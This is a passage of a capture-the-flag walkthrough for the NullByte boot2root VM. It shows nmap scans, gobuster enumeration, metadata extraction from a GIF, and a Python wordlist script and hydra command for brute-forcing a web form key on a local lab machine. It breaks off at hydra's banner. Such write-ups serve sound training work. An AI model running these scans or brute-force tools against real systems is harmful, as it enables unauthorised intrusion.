NullByte: a detailed walkthrough

Box description

Codename: NB0x01

Download: ly0n.me/nullbyte/NullByte.ova.zip

Objective: get to /root/proof.txt and follow the instructions there.

Level: basic to intermediate.

Description: Boot2root. The box gets its IP from DHCP and works well with both VirtualBox and VMware.

Hint: use your lateral thinking skills; you may need to write some code.

I. Host discovery

After starting Kali and the target, first check which subnet our own IP is on, then sweep that subnet with nmap to find live hosts.
┌──(kali㉿kali)-[~/桌面]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.118.129  netmask 255.255.255.0  broadcast 192.168.118.255
        inet6 fe80::20c:29ff:fe0a:619a  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:0a:61:9a  txqueuelen 1000  (Ethernet)
        RX packets 250029  bytes 130423271 (123.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 253052  bytes 50922991 (48.5 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(kali㉿kali)-[~/桌面]
└─$ nmap -sP 192.168.118.0/24                      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-11 17:40 CST
Nmap scan report for 192.168.118.129
Host is up (0.00062s latency).
Nmap scan report for 192.168.118.130
Host is up (0.00057s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 6.91 seconds
We already know Kali is 192.168.118.129, so the other host, 192.168.118.130, must be the target. (-sP is the legacy spelling of the ping sweep -sn. Run as an unprivileged user, as here, nmap has no raw sockets and probes TCP 80/443 with connect(); run with sudo on a local segment it uses ARP requests instead, which also finds hosts that filter ICMP.)

II. Information gathering

1. Enumerating open ports. The command is sudo nmap --min-rate 10000 -p- -oA nmapscan/ports 192.168.118.130, which scans every TCP port on the target. (The run recorded below was actually typed as sudo nmap -sT -p- without --min-rate or -oA; the four ports it reports are what the rest of the walkthrough uses.) Parameters:
Parameter  Description
--min-rate 10000  send probes at no less than 10000 per second. The only reason is to speed up collection; it is fine on a local VM but aggressive enough to lose responses on a lossy network, so lower it there.
-p-  scan all 65535 TCP ports (by default nmap only scans its top 1000)
-oA  write the results in three formats at once: normal text (.nmap), XML (.xml) and grepable (.gnmap), here under the name ports, so they can be read or parsed later
┌──(kali㉿kali)-[~/桌面/nmapscan]
└─$ sudo nmap -sT  -p-  192.168.118.130 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-12 15:24 CST
Nmap scan report for 192.168.118.130
Host is up (0.00082s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
777/tcp   open  multiling-http
50635/tcp open  unknown
MAC Address: 00:0C:29:49:E6:C8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.39 seconds
2. Collecting service details. With the open ports known, a targeted scan of just those ports can be run.
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sT -sV -O -p80,111,777,50635 -oA nmapscan/detail 192.168.118.130
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-11 20:52 CST
Nmap scan report for 192.168.118.130
Host is up (0.00035s latency).

PORT      STATE  SERVICE VERSION
80/tcp    open   http    Apache httpd 2.4.10 ((Debian))
111/tcp   open   rpcbind 2-4 (RPC #100000)
777/tcp   open   ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
50635/tcp open  unknown
MAC Address: 00:0C:29:49:E6:C8 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Initial analysis of the services running on the target:

Port  State  Service  Description
80  open  http  Apache httpd 2.4.10 (Debian)
111  open  rpcbind  rpcbind is the port mapper for Remote Procedure Call (RPC): it maps RPC program numbers dynamically to network ports (TCP/UDP). It is the base component that RPC-based services such as NFS and NIS need in order to work.
777  open  ssh  OpenSSH 6.7p1, on a non-standard port
50635  open  unknown  not identified by -sV at this stage
From nmap's OS fingerprint the target's Linux kernel should be somewhere in the 3.2 to 4.9 range.

Then run sudo nmap -sT -sV -sC -O -p80,111,777,48572 -oA nmapscan/detail 192.168.118.130 for a deeper, more precise scan. (The port list in this command says 48572 while the output below reports 50635: the RPC status service on the high port is assigned dynamically by rpcbind and moves between reboots, so re-check it with rpcinfo -p <target> or a fresh full-port scan rather than reusing a number from an earlier session.)

Parameter  Description
-sT  TCP connect scan (completes the full three-way handshake; needs no raw sockets)
-sV  probe for service versions
-sC  run the default NSE script set, which widens and deepens the scan
-O  fingerprint the target operating system
-p80,111,777,48572  the ports to probe
-oA  save the results in all three formats for later reference
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sT -sV -sC -O -p80,111,777,48572 -oA nmapscan/detail 192.168.118.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-11 20:54 CST
Nmap scan report for 192.168.118.130
Host is up (0.00036s latency).

PORT      STATE  SERVICE VERSION
80/tcp    open   http    Apache httpd 2.4.10 ((Debian))
|_http-title: Null Byte 00 - level 1
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open   rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          37297/udp   status
|   100024  1          42651/tcp6  status
|   100024  1          44330/tcp   status
|_  100024  1          57451/udp6  status
777/tcp   open   ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
|   2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
|   256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
|_  256 bc:f7:44:8d:79:6a:19:48:76:a3:e2:44:92:dc:13:a2 (ED25519)
50635/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:49:E6:C8 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The Apache banner on port 80 confirms the target is Debian; port 111 gave some RPC details; 777 is SSH; and port 50635 is RPC as well, identified by -sV as the status service (program 100024). Note that the rpcinfo table lists status on 44330/tcp rather than 50635: the outputs on this page were collected across several sessions (compare the timestamps), and that dynamic port differs between them.
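The three files that -oA writes are meant to be reused, not just read. As an added example (not part of the original walkthrough), the script below parses the grepable .gnmap output of the full-port scan and emits the -p argument for the targeted -sV -sC scan, which is exactly the hand-off made by hand above. SAMPLE_GNMAP is a constructed sample that mirrors the four ports found on this box; the file name nmapscan/ports.gnmap on the command line is an assumption.

```python
"""Parse nmap grepable (.gnmap) output into open ports and build a -p list.

Added example, not code from the original walkthrough.  The gnmap "Ports:"
section lists one entry per port with seven slash-separated fields:
    port/state/protocol/owner/service/rpc-info/version/
"""
import re
import sys
from typing import Dict, List, Tuple

# Constructed sample in gnmap format (same four ports as the scan above).
SAMPLE_GNMAP = """\
# Nmap 7.94SVN scan initiated Wed Mar 12 15:24:00 2025 as: nmap -sT -p- -oA nmapscan/ports 192.168.118.130
Host: 192.168.118.130 ()\tStatus: Up
Host: 192.168.118.130 ()\tPorts: 80/open/tcp//http///, 111/open/tcp//rpcbind///, 777/open/tcp//multiling-http///, 50635/open/tcp//unknown///\tIgnored State: closed (65531)
# Nmap done at Wed Mar 12 15:24:03 2025 -- 1 IP address (1 host up) scanned in 2.39 seconds
"""

# "Host: <ip> (<hostname>)" followed by tab-separated sections (Status:, Ports:, ...)
HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\t(.*)$")


def parse_gnmap(text: str) -> Dict[str, List[Tuple[int, str, str]]]:
    """Return {host_ip: [(port, protocol, service), ...]} for ports in state 'open'."""
    result: Dict[str, List[Tuple[int, str, str]]] = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # '#' comment lines and anything that is not a Host record
        ip, sections = m.group(1), m.group(3)
        for section in sections.split("\t"):
            if not section.startswith("Ports: "):
                continue
            for entry in section[len("Ports: "):].split(","):
                fields = entry.strip().split("/")
                if len(fields) < 5:
                    continue  # malformed entry; skip rather than guess
                port, state, proto, _owner, service = fields[:5]
                if state == "open":  # drop closed/filtered/open|filtered
                    result.setdefault(ip, []).append((int(port), proto, service))
    return result


def port_arg(ports: List[Tuple[int, str, str]]) -> str:
    """Build the -p argument for the follow-up scan, e.g. '80,111,777,50635'."""
    return ",".join(str(p) for p, _proto, _service in sorted(ports))


if __name__ == "__main__":
    # Usage: python gnmap_ports.py nmapscan/ports.gnmap   (falls back to the sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GNMAP
    for host, ports in parse_gnmap(text).items():
        print(f"{host}: -p{port_arg(ports)}")
```

Only ports whose state is exactly "open" are kept, so "open|filtered" results from a UDP scan are deliberately excluded; widen the check if you want those carried into the next scan.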

3. Scan the same ports over UDP and save the result to the udp file

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sU -p80,111,777,50635 -oA nmapscan/udp 192.168.118.130 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-12 15:39 CST
Nmap scan report for 192.168.118.130
Host is up (0.00026s latency).

PORT      STATE  SERVICE
80/udp    closed http
111/udp   open   rpcbind
777/udp   closed multiling-http
50635/udp closed unknown
MAC Address: 00:0C:29:49:E6:C8 (VMware)

Parameter  Description
-sU  UDP scan
Only UDP 111 is open. Because -p restricts this to the four TCP ports found earlier, it says nothing about other UDP services; the rpcinfo output above already showed the status service on a UDP port (37297/udp in that run), which this scan did not cover.

4. Scan with nmap's vuln script category. The documented spelling is --script=vuln; nmap also accepts the single-dash form used below.
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -script=vuln -p80,111,777,50635 -oA vuln 192.168.118.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-12 15:42 CST
Nmap scan report for 192.168.118.130
Host is up (0.00033s latency).

PORT      STATE SERVICE
80/tcp    open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum: 
|   /phpmyadmin/: phpMyAdmin
|_  /uploads/: Potentially interesting folder
111/tcp   open  rpcbind
777/tcp   open  multiling-http
50635/tcp open  unknown
MAC Address: 00:0C:29:49:E6:C8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 321.26 seconds

III. Finding vulnerabilities

1. Look at the web service on port 80. On the surface there is only a picture of an eye and one sentence: "If you search for the laws of harmony, you will find knowledge."

2. A rather philosophical line. Viewing the page source shows the title "Null Byte 00 - level 1", an image main.gif, and the sentence quoted above. Download the image first; we will check it later for hidden data.

3. Download main.gif

┌──(kali㉿kali)-[~/桌面]
└─$ wget http://192.168.118.130/main.gif
--2025-03-12 21:22:10--  http://192.168.118.130/main.gif
Connecting to 192.168.118.130:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16647 (16K) [image/gif]
Saving to: 'main.gif.1'

main.gif.1      100%[======>]  16.26K  --.-KB/s    in 0.002s

2025-03-12 21:22:10 (9.78 MB/s) - 'main.gif.1' saved [16647/16647]
4. Check the file type with the file command: it is a normal GIF image. (file only looks at the magic bytes and header, so this says nothing about embedded metadata or appended data.)
┌──(kali㉿kali)-[~/桌面]
└─$ file main.gif
main.gif: GIF image data, version 89a, 235 x 302
5. Now run exiftool on main.gif to see its metadata. The Comment tag contains a string; note it down: kzMb5nVYJw. A GIF comment lives in its own extension block, not in the pixel data, so strings main.gif would have revealed it as well; exiftool simply labels it for you.
┌──(kali㉿kali)-[~/桌面]
└─$ exiftool main.gif           
ExifTool Version Number         : 12.76
File Name                       : main.gif
Directory                       : .
File Size                       : 17 kB
File Modification Date/Time     : 2015:08:02 00:39:30+08:00
File Access Date/Time           : 2025:03:12 21:21:27+08:00
File Inode Change Date/Time     : 2025:03:12 21:21:26+08:00
File Permissions                : -rw-r--r--
File Type                       : GIF
File Type Extension             : gif
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 235
Image Height                    : 302
Has Color Map                   : No
Color Resolution Depth          : 8
Bits Per Pixel                  : 1
Background Color                : 0
Comment                         : P-): kzMb5nVYJw
Image Size                      : 235x302
Megapixels                      : 0.071
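To see where exiftool's Comment tag actually comes from, here is an added example (not part of the original walkthrough) that walks the GIF block structure by hand and returns every Comment Extension (introducer 0x21, label 0xFE) in the file. build_sample_gif is a constructed test fixture that produces a minimal 1x1 GIF89a carrying the same comment string found above; the script can also be pointed at a real file such as main.gif.

```python
"""Extract GIF Comment Extension blocks without exiftool.

Added example, not code from the original walkthrough.  GIF layout:
  header (6) | logical screen descriptor (7) | [global colour table]
  | blocks: 0x21 extension, 0x2C image descriptor, 0x3B trailer
Every extension payload and the image data use length-prefixed sub-blocks
terminated by a 0x00 byte, so one reader handles all of them.
"""
import struct
import sys
from typing import List, Optional


def gif_comments(data: bytes) -> List[str]:
    """Return the text of every Comment Extension in a GIF87a/GIF89a file."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF file")
    pos = 6
    _w, _h, packed, _bg, _aspect = struct.unpack_from("<HHBBB", data, pos)
    pos += 7
    if packed & 0x80:  # global colour table: 3 bytes x 2^(N+1) entries
        pos += 3 * (2 << (packed & 0x07))

    def read_subblocks(p: int):
        """Concatenate data sub-blocks starting at p; return (payload, next_pos)."""
        chunks = []
        while True:
            size = data[p]
            p += 1
            if size == 0:
                return b"".join(chunks), p
            chunks.append(data[p:p + size])
            p += size

    comments: List[str] = []
    while pos < len(data):
        introducer = data[pos]
        if introducer == 0x3B:  # trailer: end of stream
            break
        if introducer == 0x21:  # extension: label byte, then sub-blocks
            label = data[pos + 1]
            payload, pos = read_subblocks(pos + 2)
            if label == 0xFE:  # Comment Extension
                comments.append(payload.decode("latin-1"))
        elif introducer == 0x2C:  # image descriptor, optional local table, LZW data
            _l, _t, _iw, _ih, ipacked = struct.unpack_from("<HHHHB", data, pos + 1)
            pos += 10
            if ipacked & 0x80:
                pos += 3 * (2 << (ipacked & 0x07))
            pos += 1  # LZW minimum code size
            _image, pos = read_subblocks(pos)
        else:
            raise ValueError(f"unexpected block 0x{introducer:02x} at offset {pos}")
    return comments


def build_sample_gif(comment: Optional[bytes], with_gct: bool = True) -> bytes:
    """Constructed fixture: a 1x1 GIF89a, optionally with a comment (<=255 bytes)."""
    packed = 0x80 if with_gct else 0x00  # size field 0 => 2-entry table (6 bytes)
    out = b"GIF89a" + struct.pack("<HHBBB", 1, 1, packed, 0, 0)
    if with_gct:
        out += b"\x00\x00\x00\xff\xff\xff"
    if comment is not None:
        out += b"\x21\xfe" + bytes([len(comment)]) + comment + b"\x00"
    out += b"\x21\xf9\x04\x00\x00\x00\x00\x00"  # graphic control extension
    out += b"\x2c" + struct.pack("<HHHHB", 0, 0, 1, 1, 0) + b"\x02\x02\x44\x01\x00"
    return out + b"\x3b"


if __name__ == "__main__":
    # Usage: python gif_comments.py main.gif   (falls back to the built-in fixture)
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_gif(b"P-): kzMb5nVYJw")
    for text in gif_comments(blob):
        print("Comment:", text)
```

Walking the file rather than grepping it matters when a comment is split across several sub-blocks (anything longer than 255 bytes), where strings would show it in fragments; read_subblocks joins them back together.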
6. With no other leads on port 80, the nmap vuln scripts were run to look for weaknesses (the saved vuln.nmap file below is the same output already shown in step 4 of the information-gathering section). They turned up something useful: two directories, /phpmyadmin/ and /uploads/. nmap also flags a likely Slowloris DoS weakness; that check is a heuristic ("LIKELY VULNERABLE") and a DoS is no use for getting a shell, so ignore it.

7. Before looking at those two directories, run gobuster against the target to see whether there are any other surprises. There is one new directory, /javascript/ (plus /server-status, which returns 403). gobuster does not need sudo; it was just typed that way here.


┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.118.130 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 
[sudo] password for kali:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.118.130
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 320] [--> http://192.168.118.130/uploads/]
/javascript           (Status: 301) [Size: 323] [--> http://192.168.118.130/javascript/]
/phpmyadmin           (Status: 301) [Size: 323] [--> http://192.168.118.130/phpmyadmin/]
/server-status        (Status: 403) [Size: 303]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
8. Let's see what these three directories hold. /phpmyadmin/ is the phpMyAdmin login page; try the odd string we found earlier as the password.


9. No luck. Brute-forcing the admin password with Burp Suite didn't turn anything up either, so move on to the other pages.

10. Damn, /javascript/ is forbidden (403). Next directory.

11. /uploads/ is no good either. Let's try SSH and see whether the mystery string brings any luck there.

12. Try the string kzMb5nVYJw as the root password over SSH on port 777. Still no luck...


┌──(kali㉿kali)-[~]
└─$ sudo ssh root@192.168.118.130 -p 777 
root@192.168.118.130's password: 
Permission denied, please try again.
root@192.168.118.130's password:

13. After a long think another idea came up: what if the mystery string is a directory? One way to find out. Oh yes, it is a directory, and it shows a single input box.

14. Look at the page source. There is a hint: "this form isn't connected to mysql, password ain't that complex".
15. If it says the password isn't complex, try a few simple ones. The response is "invalid key".

16. After many attempts with no result, just brute-force it with hydra, which finds the key: elite. The module argument is path:POST-body:failure-string, so hydra counts any response that does not contain "invalid key" as a hit; the form has no username field, which is why -l litemao is just a placeholder value that hydra requires.
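This is the point where the box's hint ("maybe you need to write some code") applies: the form has one field, and a wrong guess is signalled by the text "invalid key". As an added example (not part of the original walkthrough, and not what hydra itself does internally), the script below runs a wordlist against such a form and treats the first response without that marker as the hit. It assumes the form POSTs a field named key to /kzMb5nVYJw/index.php; fake_submit is a constructed stand-in for the target so the logic can be exercised offline, and the success body it returns is invented.

```python
"""Wordlist attack against a single-field form that answers "invalid key" on a miss.

Added example, not code from the original walkthrough.  Two details hydra's
-F/failure-string mode also relies on are made explicit here: the failure
marker is verified with a known-bad guess first (so a changed or broken page
does not produce a false positive), and candidates are read in latin-1 because
rockyou.txt is not valid UTF-8 throughout.
"""
import functools
import secrets
import sys
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Optional

FAIL_MARKER = "invalid key"  # response text observed for a wrong guess


def http_submit(url: str, key: str, timeout: float = 5.0) -> str:
    """POST key=<guess> to the form at url and return the response body as text."""
    body = urllib.parse.urlencode({"key": key}).encode()
    req = urllib.request.Request(url, data=body, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def brute_force_key(candidates: Iterable[str], submit: Callable[[str], str],
                    fail_marker: str = FAIL_MARKER) -> Optional[str]:
    """Return the first candidate whose response lacks fail_marker, or None."""
    # Calibrate: a random key must fail, otherwise the marker is wrong and every
    # guess would look like a success.
    canary = "canary-" + secrets.token_hex(8)
    if fail_marker not in submit(canary):
        raise RuntimeError("failure marker not seen for a known-bad key; check the form")
    for guess in candidates:
        guess = guess.rstrip("\r\n")
        if not guess:
            continue
        if fail_marker not in submit(guess):
            return guess
    return None


def fake_submit(key: str) -> str:
    """Constructed stand-in for the target form (offline test double)."""
    if key == "elite":
        return "<html><body>ok</body></html>"  # invented success body
    return "<html><body>invalid key</body></html>"


if __name__ == "__main__":
    if len(sys.argv) == 3:
        # Usage: python form_brute.py http://192.168.118.130/kzMb5nVYJw/index.php /usr/share/wordlists/rockyou.txt
        submit = functools.partial(http_submit, sys.argv[1])
        with open(sys.argv[2], encoding="latin-1") as wordlist:
            print("key:", brute_force_key(wordlist, submit))
    else:
        print("key:", brute_force_key(["123456", "password", "elite"], fake_submit))
```

The calibration step is the part worth keeping whatever tool you use: with hydra's failure-string mode, a typo in the marker or an error page from the server makes the very first guess "succeed".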

┌──(kali㉿kali)-[~]
└─$ sudo hydra 192.168.118.130 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l litemao -P /usr/share/wordlists/rockyou.txt
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or